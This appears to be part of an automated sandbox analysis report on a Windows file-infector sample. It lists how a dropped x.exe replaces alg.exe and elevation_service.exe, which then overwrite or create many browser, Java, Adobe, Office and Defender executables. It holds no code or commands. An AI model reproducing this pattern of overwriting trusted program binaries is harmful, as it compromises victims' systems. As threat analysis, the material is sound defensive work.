                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exe System file written: C:\Windows\System32\alg.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                  Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\Locator.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\user\AppData\Local\subpredicate\differences.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
